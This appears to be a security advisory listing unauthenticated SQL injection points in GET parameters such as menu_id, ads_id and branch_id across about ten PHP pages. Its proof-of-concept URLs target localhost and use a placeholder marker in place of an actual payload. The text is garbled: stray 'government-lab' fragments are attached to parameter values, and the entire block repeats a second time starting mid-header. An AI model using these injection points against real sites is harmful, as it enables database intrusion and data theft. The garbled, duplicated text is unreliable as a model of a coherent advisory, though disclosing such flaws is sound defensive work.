Request Method(s):
[+] GET
Vulnerable File(s):
[+] page_details.php
[+] gallery.php
[+] view_ads_desc.php
[+] eventsdesc.php
[+] page_details.php
[+] news.php
[+] boxes_details.php
[+] centre_details.php
[+] gallerydetails.php
[+] news_desc.php
Vulnerable Parameter(s):
[+] menu_id
[+] ads_id
[+] gallary_category_id
[+] mmenu
[+] news
[+] boxes_id
[+] branch_id
[+] news_events_id
[+] id
Proof of Concept (PoC):
=======================
The sql injection web vulnerabilities can be exploited by remote
attackers without privileged web-application user account or user
interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
PoC:
www.localhost:8000/page_details.php?menu_id=214government-lab&menu_name=news-and-eventsgovernment-lab[SQL
INJECTION VULNERABILITY!]--
www.localhost:8000/page_details.php?menu_id=P%20V%20MATCHING%20BONUSgovernment-lab[SQL
INJECTION VULNERABILITY!]--
www.localhost:8000/gallery.php?menu_id=8government-lab[SQL INJECTION
VULNERABILITY!]--
www.localhost:8000/view_ads_desc.php?ads_id=4government-lab[SQL
INJECTION VULNERABILITY!]--
www.localhost:8000/eventsdesc.php?gallary_category_id=1government-lab[SQL INJECTION
VULNERABILITY!]--
www.localhost:8000/page_details.php?mmenu=gallerygovernment-lab[SQL
INJECTION VULNERABILITY!]--
www.localhost:8000/in/news.php?news=27government-lab[SQL INJECTION
VULNERABILITY!]--
www.localhost:8000/boxes_details.php?boxes_id=172government-lab[SQL
INJECTION VULNERABILITY!]--
www.localhost:8000/zhcc/centre_details.php?branch_id=c81e728d9d4c2f636f067f89cc14862cgovernment-lab[SQL
INJECTION VULNERABILITY!]--
www.localhost:8000/online/gallerydetails.php?id=2government-lab[SQL
INJECTION VULNERABILITY!]--
www.localhost:8000/home/news_desc.php?news_events_id=24government-lab[SQL INJECTION
VULNERABILITY!]--
[+] GET
Vulnerable File(s):
[+] page_details.php
[+] gallery.php
[+] view_ads_desc.php
[+] eventsdesc.php
[+] page_details.php
[+] news.php
[+] boxes_details.php
[+] centre_details.php
[+] gallerydetails.php
[+] news_desc.php
Vulnerable Parameter(s):
[+] menu_id
[+] ads_id
[+] gallary_category_id
[+] mmenu
[+] news
[+] boxes_id
[+] branch_id
[+] news_events_id
[+] id
Proof of Concept (PoC):
=======================
The sql injection web vulnerabilities can be exploited by remote
attackers without privileged web-application user account or user
interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
PoC:
www.localhost:8000/page_details.php?menu_id=214government-lab&menu_name=news-and-eventsgovernment-lab[SQL
INJECTION VULNERABILITY!]--
www.localhost:8000/page_details.php?menu_id=P%20V%20MATCHING%20BONUSgovernment-lab[SQL
INJECTION VULNERABILITY!]--
www.localhost:8000/gallery.php?menu_id=8government-lab[SQL INJECTION
VULNERABILITY!]--
www.localhost:8000/view_ads_desc.php?ads_id=4government-lab[SQL
INJECTION VULNERABILITY!]--
www.localhost:8000/eventsdesc.php?gallary_category_id=1government-lab[SQL INJECTION
VULNERABILITY!]--
www.localhost:8000/page_details.php?mmenu=gallerygovernment-lab[SQL
INJECTION VULNERABILITY!]--
www.localhost:8000/in/news.php?news=27government-lab[SQL INJECTION
VULNERABILITY!]--
www.localhost:8000/boxes_details.php?boxes_id=172government-lab[SQL
INJECTION VULNERABILITY!]--
www.localhost:8000/zhcc/centre_details.php?branch_id=c81e728d9d4c2f636f067f89cc14862cgovernment-lab[SQL
INJECTION VULNERABILITY!]--
www.localhost:8000/online/gallerydetails.php?id=2government-lab[SQL
INJECTION VULNERABILITY!]--
www.localhost:8000/home/news_desc.php?news_events_id=24government-lab[SQL INJECTION
VULNERABILITY!]--
